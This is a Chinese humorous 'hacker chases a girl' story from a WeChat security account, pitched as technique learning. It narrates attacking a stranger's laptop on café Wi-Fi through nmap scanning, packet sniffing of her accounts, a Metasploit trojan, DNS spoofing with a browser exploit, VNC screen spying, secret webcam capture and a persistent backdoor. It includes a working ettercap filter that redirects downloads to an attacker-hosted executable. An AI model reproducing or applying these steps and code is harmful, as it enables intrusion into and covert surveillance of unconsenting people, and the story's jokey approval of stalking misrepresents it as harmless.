姿勢學習:屌絲黑客＂追＂妹記

來自：天蠍安全（微信號：Scorpion_SEC）

第一章：咖啡館的意外偶遇

註：此小說由真實案例改編

眾所周知黑客都是技術宅，在電腦強烈的輻射下，技術宅遲早有一日成為了大家心目中的「屌絲」，當然黑客沒有女朋友那是理所當然的。

可是沒女朋友就真的願意當一個屌絲嗎？當然不是，當屌絲我們也要當一個「幸福」的屌絲

黑客是神秘的，可以出現在地球的任意一個角落，當然火星也是可以去的，在黑客眼中，對他來說沒有什麼是隱私，因為根本沒有這個詞，

「沒女朋友，可笑！」

「你不知道嗎？只要是女的都是我的女朋友」

Only站起來嚴肅的看著我們說

Only是我的大學同學，也是一個非常出色的黑客，（黑客？他就是一個屌絲）

大家有時候坐在一起都會嘲笑他還沒有找到女朋友，同學們都一個個的結婚了，甚至有的孩子都上小學了。

Only比較內向，平時都不怎麼說話，大家一直開他玩笑，他也都習慣了，有時候就笑笑略過了，根本不會去計較什麼！

大家看到Only這麼嚴肅都被嚇到了，整個咖啡廳都安靜了，不一會隔壁桌的一個女孩發出了笑聲，應該是在嘲笑他剛才說的那句話，Only有點臉紅了，淡定的坐了下來

「你看！你吹牛把妹紙都逗笑了」

「剛那妹紙長得挺清秀的，你讓她做你女朋友唄」

..

..

各種嘲諷的話語讓Only終於忍不住了，Only打開了桌上的筆記本

看了下自己的IP位址:

然後再用nmap探測了下wifi內存活的主機

分析了下

192.168.169.1

192.168.169.254

應該是路由器

192.198.168.130是自己的主機

那剩下的應該是咖啡館裡其他用戶的主機

「你在幹什麼」大家都很好奇

「不是你們說讓那個女孩做我的女朋友嗎？看著吧」

Only露出了邪惡的笑容

我轉頭看了下隔壁桌的妹子，妹子一個人在寫什麼東西(應該是這樣的)

only估計是想搞下那個妹子的電腦，only掃描了咖啡廳所有的電腦只有這幾個在線，所以其中一臺肯定是妹子的主機

現在只要確定那一臺是妹子的主機就可以了

最簡單的方法就是去問？(顯然不可能，妹子又不傻)

現在如果妹子在各種瀏覽什麼網頁，也許可以通過嗅探數據得到到底那一臺是妹子的電腦，

0nly打開了wireshark進行了抓包嗅探，因為好多個主機有大量的數據包，所以分析數據是很費時費力的，Only一直在盯著妹子，好像在等待什麼,突然他又露出了那詭異的笑容

「就是這個」

我們都湊過去看

「你怎麼知道的」

「剛她登錄郵箱發郵件了」

Only你可真是屌絲啊，I服了you！

確定了妹子的IP位址是 192.168.169.131

從嗅探中Only得知了妹子經常會用QQ郵箱發郵件和上微博，知道了妹子的QQ號和微博號

這還不夠讓Only滿足,他打開nmap探測了下妹子的作業系統

居然用的XP,那可以用ettercap進行欺騙然後掛馬了

這樣就可以獲得妹子的主機權限了

Only用metasploit（神器）生成了一個木馬

Only打開了ettercap準備進行中間人攻擊

首先新建一個規則

# replace rmccurdy with your website
# replace the url with what ever exe you like

if (ip.proto == TCP && tcp.dst == 80) {
if (search(DATA.data, "Accept-Encoding")) {
replace("Accept-Encoding", "Accept-Rubbish!");
# note: replacement string is same length as original string
msg("zapped Accept-Encoding!\n");
}
}
if (ip.proto == TCP && tcp.src == 80) {
replace("keep-alive", "close" ");
replace("Keep-Alive", "close" ");

}

if (ip.proto == TCP && search(DATA.data, ": application") ){
# enable for logging log(DECODED.data, "/tmp/log.log");
msg("found EXE\n");
# "Win32" is the first part of the exe example:
# if the EXE started with "this program must be run in MSDOS mode" you could search for MSDOS etc ..
if (search(DATA.data, "Win32")) {
msg("doing nothing\n");
} else {
replace("200 OK", "301 Moved Permanently
Location: http://www.xxx.com/exe.exe
");
msg("redirect success\n");

}
}

然後改掉裡面的下載地址

最後編譯下

然後進行欺騙

當妹紙不管下載什麼東西的時候都會替換成我們的木馬進行下載她運行後我們就可以獲取權限了(當然木馬首先得是免殺)

類似這樣

所以當妹子下載什麼的時候運行了我們的程序，就會中招

同時Only還用了另一種方法來進行攻擊(怕妹子不上當)

因為前面得知妹子用的是XP所以Only生成了對IE瀏覽器攻擊的網馬

根據目標情況選擇攻擊模塊

然後就用ettercap進行DNS欺騙

然後編輯我們的本地網頁寫上我們的網馬代碼

妹子訪問任意www網頁的這時候打開類似這樣

不一會，妹子就中了Only設下的陷阱

都獲取權限了那什麼都能幹了，我們看下妹子在幹什麼

開啟VNC

Only就這樣盯著看了半個小時，看妹子在幹什麼

緩過神後，0nly留了持久後門開了3389加上了遠控木馬(Only更喜歡這個)

然後產生了一個邪惡的想法(他想看妹子長什麼樣,因為妹子一直背坐著我們)

打開妹子的攝像頭雖然獲取了一張妹子的照片，但這遠遠不能滿足Only

他要的是一個攝像頭

Only滿意的露出了笑容，但馬上又板起臉來，好像想起了什麼不開心的事

繼續敲著鍵盤

開始編輯本地網頁(我知道他要幹什麼了)

開啟了DNS欺騙

妹子訪問任意www網站的時候

同時Only又做了一個惡作劇

妹子的桌面上就出現了這樣一個彈窗

妹子看到網頁上有自己的照片再加上這樣的彈窗，應該是被嚇到了，四處張望了一下，立馬關上電腦離開了咖啡廳

「妹子都被你嚇跑了」

「啊」

Only這會沉浸在自己的「作品」中，有點得意,他聽到自己把妹子嚇跑了，又有一點失落，不過Only在妹子電腦上留了後門

「我們也走吧」

Only說，然後急匆匆的收拾了東西也跑了出去，

我們大家好像發現了點什麼，就一起笑著也跟了出去

後面Only還會用什麼方法繼續追妹子呢？黑客的方法又怎麼不同尋常呢？請繼續關注<屌絲黑客「追」妹記：第二集>

●本文編號103，以後想閱讀這篇文章直接輸入103即可。

●輸入m可以獲取到文章目錄。

更多推薦請看《15個技術類公眾微信》

涵蓋：程序人生、算法與數據結構、黑客技術與網絡安全、大數據技術、前端開發、Java、Python、Web開發、安卓開發、iOS開發、C/C++、.NET、Linux、資料庫、運維等。傳播計算機學習經驗、推薦計算機優秀資源：點擊前往《值得關注的15個技術類微信公眾號》

點擊閱讀原文，了解野狗